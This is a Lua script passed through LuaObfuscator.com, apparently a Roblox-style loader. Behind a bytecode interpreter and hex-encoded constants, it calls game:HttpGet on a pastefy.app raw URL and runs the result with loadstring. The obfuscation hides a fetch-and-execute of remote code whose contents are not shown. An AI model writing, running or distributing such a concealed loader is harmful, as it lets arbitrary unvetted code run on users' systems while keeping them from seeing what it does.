--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v85=v2(v0(v30,16));if v19 then local v108=v5(v85,v19);v19=nil;return v108;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=0;local v87;while true do if (v86==((1637 -(1523 + 114)) -(0 + 0))) then v87=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-1)) + (932 -(857 + 74)))) ;return v87-(v87%(569 -((523 -156) + 201))) ;end end else local v88=(929 -(214 + 713))^(v32-((1066 -(68 + 997)) + (1270 -(226 + 1044)))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or ((3818 -2941) -(282 + 595)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23() local v37=957 -(892 + 65) ;local v38;local v39;local v40;local v41;while true do if (v37==((0 + 0) -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;v37=1 -(0 -0) ;end if (v37==1) then return (v41 * (16777566 -(87 + 263))) + (v40 * 65536) + (v39 * (436 -(67 + 113))) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,3 -2 ,972 -(802 + 150) ) * ((5 -3)^(57 -25))) + v42 ;local v46=v20(v43,21,23 + 8 );local v47=((v20(v43,32)==(998 -(915 + 82))) and  -(2 -1)) or 1 ;if (v46==(0 + 0)) then if (v45==((0 -0) -0)) then return v47 * ((1629 -(416 + 26)) -(1069 + 118)) ;else v46=2 -1 ;v44=0 -(0 -0) ;end elseif (v46==2047) then return ((v45==(0 + 0 + 0)) and (v47 * ((1 -0)/(0 + (0 -0))))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -((806 -(145 + 293)) + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48) local v49=430 -(44 + 386) ;local v50;local v51;while true do if (v49==3) then return v6(v51);end if (v49==(1487 -((3543 -2545) + 488))) then v50=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(2 + 0)) then v51={};for v109=773 -(201 + 571) , #v50 do v51[v109]=v2(v1(v3(v50,v109,v109)));end v49=1141 -(116 + 1022) ;end if (v49==0) then v50=nil;if  not v48 then local v115=0;while true do if (v115==(0 -0)) then v48=v23();if (v48==((859 -(814 + 45)) + 0)) then return "";end break;end end end v49=3 -(4 -2) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 1194 -(352 + 842) ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89~=(0 -0)) then else local v116=(function() return 1821 -(1483 + 338) ;end)();while true do if (v116==(1695 -(1229 + 466))) then v90=(function() return v91();end)();v92=(function() return nil;end)();v116=(function() return 1;end)();end if (v116~=(579 -(386 + 192))) then else v89=(function() return  #",";end)();break;end end end if (v89== #"|") then if (v90== #"\\") then v92=(function() return v91()~=(1206 -(696 + 510)) ;end)();elseif (v90==2) then v92=(function() return v93();end)();elseif (v90== #"91(") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99) local v100=(function() return 0 -0 ;end)();local v101=(function() return;end)();while true do if (0~=v100) then else v101=(function() return 1262 -(1091 + 171) ;end)();while true do if ((0 + 0)~=v101) then else local v122=(function() return 0;end)();while true do if (v122==(0 -0)) then v97[v98-#"!" ]=(function() return v99();end)();return v97,v98,v99;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"~",v58 do FlatIdent_C460,Type,v21,Cons,v24,v25,v59,v67=(function() return v52(FlatIdent_C460,Type,v21,Cons,v24,v25,v59,v67);end)();end v57[ #"gha"]=(function() return v21();end)();for v68= #"~",v23() do local v69=(function() return v21();end)();if (v20(v69, #"!", #">")~=0) then else local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104==(376 -(123 + 251))) then if (v20(v106, #"\\", #"{")== #"]") then v107[9 -7 ]=(function() return v59[v107[2]];end)();end if (v20(v106,2,700 -(208 + 490) )~= #",") then else v107[ #"xnx"]=(function() return v59[v107[ #"nil"]];end)();end v104=(function() return 3;end)();end if (v104==1) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==(0 + 0)) then local v125=(function() return 0;end)();local v126=(function() return;end)();while true do if (v125~=0) then else v126=(function() return 836 -(660 + 176) ;end)();while true do if (v126==0) then v107[ #"19("]=(function() return v22();end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end elseif (v105== #">") then v107[ #"-19"]=(function() return v23();end)();elseif (v105==2) then v107[ #"19("]=(function() return v23() -((1 + 1)^(218 -(14 + 188))) ;end)();elseif (v105== #"19(") then local v158=(function() return 675 -(534 + 141) ;end)();local v159=(function() return;end)();while true do if (v158==(0 + 0)) then v159=(function() return 0;end)();while true do if (v159==(0 + 0)) then v107[ #"-19"]=(function() return v23() -((2 + 0)^16) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v104=(function() return 3 -1 ;end)();end if (v104==0) then local v120=(function() return 0 -0 ;end)();while true do if (v120==(0 -0)) then local v128=(function() return 0;end)();while true do if ((1 + 0)~=v128) then else v120=(function() return 1 + 0 ;end)();break;end if (v128==0) then v105=(function() return v20(v69,398 -(115 + 281) , #"-19");end)();v106=(function() return v20(v69, #".dev",13 -7 );end)();v128=(function() return 1 + 0 ;end)();end end end if (1==v120) then v104=(function() return 2 -1 ;end)();break;end end end if (v104~=3) then else if (v20(v106, #"19(", #"xxx")== #"!") then v107[ #"0313"]=(function() return v59[v107[ #"0313"]];end)();end v54[v68]=(function() return v107;end)();break;end end end end for v70= #":",v23() do v55,v70,v28=(function() return v53(v55,v70,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[3 -(1 + 1) ];local v65=v61[2];local v66=v61[870 -(550 + 317) ];return function(...) local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=1;local v76= -((1 + 0) -0);local v77={};local v78={...};local v79=v12("#",...) -(2 -1) ;local v80={};local v81={};for v102=0,v79 do if (v102>=v73) then v77[v102-v73 ]=v78[v102 + (286 -(134 + 151)) ];else v81[v102]=v78[v102 + (1666 -(970 + 176 + 519)) ];end end local v82=(v79-v73) + (1 -0) ;local v83;local v84;while true do local v103=1990 -(582 + 1408) ;while true do if (v103==1) then if ((v84<=(10 -7)) or (4166==455)) then if (v84<=(1 -0)) then if (v84==(0 -0)) then v81[v83[1826 -(1195 + (1856 -1227)) ]]();else v81[v83[2 -0 ]]=v63[v83[7 -4 ]];end elseif (v84==(243 -((301 -(4 + 110)) + 54))) then do return;end else local v133=v83[782 -(162 + 618) ];local v134,v135=v74(v81[v133](v13(v81,v133 + 1 ,v83[3])));v76=(v135 + v133) -(1 + 0) ;local v136=0 + 0 ;for v153=v133,v76 do v136=v136 + (1 -0) ;v81[v153]=v134[v136];end end elseif (v84<=(8 -3)) then if (v84==((530 -(406 + 123)) + (1772 -(1749 + 20)))) then v81[v83[1638 -(1373 + 263) ]]=v83[1003 -(451 + (1133 -(57 + 527))) ];else local v139=0;local v140;local v141;local v142;local v143;local v144;while true do if (v139==(2 + 3)) then v81[v83[2 -0 ]]();v75=v75 + (1 -0) ;v83=v71[v75];do return;end break;end if ((v139==(1384 -(746 + 638))) or (4449==2663)) then v140=nil;v141,v142=nil;v143=nil;v144=nil;v81[v83[1 + 1 ]]=v63[v83[4 -1 ]];v75=v75 + (342 -(218 + 123)) ;v139=(3009 -(41 + 1386)) -(1535 + 46) ;end if (v139==3) then v83=v71[v75];v144=v83[2 + 0 ];v141,v142=v74(v81[v144](v13(v81,v144 + 1 ,v83[1 + 2 ])));v76=(v142 + v144) -((134 + 427) -(306 + 254)) ;v140=0;for v179=v144,v76 do v140=v140 + 1 + 0 ;v81[v179]=v141[v140];end v139=(110 -(17 + 86)) -3 ;end if ((v139==(1469 -(899 + 568))) or (4277<2989)) then v81[v144 + 1 ]=v143;v81[v144]=v143[v83[4]];v75=v75 + 1 + 0 ;v83=v71[v75];v81[v83[(1326 -(1249 + 73)) -2 ]]=v83[606 -(268 + 335) ];v75=v75 + (291 -(60 + 230)) ;v139=575 -(426 + 146) ;end if (v139==(1 + 3)) then v75=v75 + 1 ;v83=v71[v75];v144=v83[1458 -(282 + 1174) ];v81[v144]=v81[v144](v13(v81,v144 + (812 -(569 + 242)) ,v76));v75=v75 + 1 ;v83=v71[v75];v139=14 -9 ;end if (v139==(1 + 0)) then v83=v71[v75];v81[v83[1026 -(706 + 318) ]]=v63[v83[1254 -(721 + 530) ]];v75=v75 + (1272 -(945 + 326)) ;v83=v71[v75];v144=v83[4 -2 ];v143=v81[v83[3]];v139=2 + 0 ;end end end elseif (v84>((252 + 454) -((1416 -(466 + 679)) + 429))) then local v145=v83[2];v81[v145]=v81[v145](v13(v81,v145 + 1 + (0 -0) ,v76));else local v147=v83[1502 -(1408 + 92) ];local v148=v81[v83[(3114 -2025) -(461 + 625) ]];v81[v147 + (1289 -(993 + 201 + 94)) ]=v148;v81[v147]=v148[v83[1 + (1903 -(106 + 1794)) ]];end v75=v75 + ((2613 -1441) -(418 + (2180 -1427))) ;break;end if ((v103==0) or (870>=4149)) then v83=v71[v75];v84=v83[1];v103=1 + (166 -(122 + 44)) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F5554706F62446F762F72617700083Q0012053Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
